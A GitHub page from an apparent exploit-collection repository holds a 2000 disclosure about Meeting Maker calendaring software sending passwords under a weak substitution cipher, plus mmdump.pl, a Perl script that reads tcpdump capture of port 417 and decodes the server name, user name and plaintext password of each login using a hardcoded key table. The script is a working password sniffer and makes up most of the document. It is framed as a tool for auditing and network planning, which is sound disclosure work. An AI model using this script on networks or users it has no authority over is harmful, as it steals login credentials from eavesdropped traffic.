forked from ProjectZeroDays/Exploits2
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmmdump.pl
executable file
·160 lines (152 loc) · 6.37 KB
/
mmdump.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
Meeting Maker is a networked calendaring/scheduling software package
that's estimated to be installed on over 700,000 desktops (e.g., see
http://www.meetingmaker6.com/presslib/pressrel/mm061499mm6.htm).
(Meeting Maker is a registered trademark of ON Technology Corporation.)
Clients send passwords to a Meeting Maker server encoded using a
polyalphabetic substitution cipher. For an outline of the risks, as
well as suggestions about how to reduce vulnerability and notes about
future Meeting Maker security changes, go to the Tech Note index page
at http://support.on.com/support/mmxp.nsf/Public/Chronological and
select the security item dated 04/19/2000.
I was able to determine the password encoding by intercepting
client-to-server traffic. Meeting Maker site administrators may need
to check on what passwords are being sent because of requirements for
-- Auditing. You may have a policy that a user must not choose a
Meeting Maker password that's the same as any of their other
passwords, and need to verify policy adherence.
-- Network planning. You may need to assess whether password-stealing
threats justify the costs of making the communication channel
between your Meeting Maker clients and server encrypted (or
otherwise less vulnerable to eavesdropping).
I've included a script that can be used in conjunction with tcpdump to
monitor one's network for Meeting Maker logins. For each login
exchange that the script detects, the script provides the IP address
of the Meeting Maker server, the server name (this won't necessarily
match the server's DNS hostname), and the client user's name and
password. The script does not understand the client-server protocol,
and may well miss some (or, potentially in some environments, all)
valid login exchanges. The network-traffic details that were used in
developing the script were based on client hosts running Meeting Maker
Java Client 6.04 and a Meeting Maker server running on Windows NT 4.0.
Matt Power
#!/usr/bin/perl
#
# mmdump -- filters tcpdump output to find Meeting Maker passwords
#
# Author: Matt Power, [email protected]
# 24 April 2000
#
#
# usage: tcpdump -lnx -s 300 'tcp dst port 417' | mmdump
#
# (Note: Meeting Maker is a registered trademark of ON Technology
# Corporation)
#
#
@x = (20, 8, 9, 19, 9, 19, 1, 19, 20, 21, 16, 9, 4, 23, 1, 19,
20, 5, 15, 6, 20, 9, 13, 5, 1, 14, 4, 19, 16, 1, 3, 5);
$in = "";
$ipl = <>;
@ipf = split(/ /, $ipl);
@ic = split(/\./, $ipf[3]);
$ip = $ic[0] . "." . $ic[1] . "." . $ic[2] . "." . $ic[3];
while (<>)
{
if (/^\s/)
{
$in .= $_;
}
else
{
$ipl = $_;
@ipf = split(/ /, $ipl);
@ic = split(/\./, $ipf[3]);
$newip = $ic[0] . "." . $ic[1] . "." . $ic[2] . "." . $ic[3];
$in =~ s/\s//g;
$in =~ s/(..)/$1 /g;
if ($in =~ /.*7f ff ff .*?00 00 00 .*?00 00 00 (.*)/)
{
if ($1 !~ /^[0 ]+$/)
{
($s = $1) =~ s/ //g;
$s1 = hex(substr($s, 0, 2));
$s = substr($s, 2, length($s) - 2);
$s0 = hex(substr($s, 0, 2));
$s3 = 2 * ($s0 + 3);
$s = substr($s, 2, length($s) - 2);
if ($s1 == $s0 + 1 and length($s) >= $s3)
{
$f = substr($s, 0, $s0 * 2);
$p = sprintf "H%d", 2 * $s0;
$fn = pack $p, $f;
$out = "Server Address: " . $ip . "\n";
$out .= "Server Name: " . $fn . "\n";
$s = substr($s, $s3, length($s) - $s3);
$s1 = hex(substr($s, 0, 2));
$s = substr($s, 2, length($s) - 2);
$s0 = hex(substr($s, 0, 2));
$s3 = 2 * ($s0 + 3);
$s = substr($s, 2, length($s) - 2);
if ($s1 == $s0 + 1 and length($s) >= $s3)
{
$f = substr($s, 0, $s0 * 2);
$p = sprintf "H%d", 2 * $s0;
$fn = pack $p, $f;
$out .= "User Name: " . $fn . "\nPassword: ";
$s = substr($s, $s3, length($s) - $s3);
$s1 = hex(substr($s, 0, 2));
$s = substr($s, 2, length($s) - 2);
$s0 = hex(substr($s, 0, 2));
$s = substr($s, 2, length($s) - 2);
if ($s1 == $s0 + 1 and length($s) == 2 * $s0)
{
for ($j = 0; $j < 2 * $s0; $j += 2)
{
$nr = hex(substr($s, $j, 2));
$i = $j / 2;
if ($nr >= 96)
{
$nr -= 96;
if ($i)
{
$out = "";
last;
}
$out .= chr(($nr ^ $x[$i]) + 32);
}
elsif ($nr >= 64)
{
$nr -= 64;
if (! $i)
{
$out = "";
last;
}
$out .= chr(($nr ^ $x[$i]) + 32);
}
elsif ($nr >= 32)
{
$nr -= 32;
$out .= chr(($nr ^ $x[$i]) +
($i ? 64 : 96));
}
else
{
$out .= chr(($nr ^ $x[$i]) +
($i ? 96 : 64));
}
}
if ($out ne "")
{
print $out . "\n\n";
}
}
}
}
}
}
$in = "";
$ip = $newip;
}
}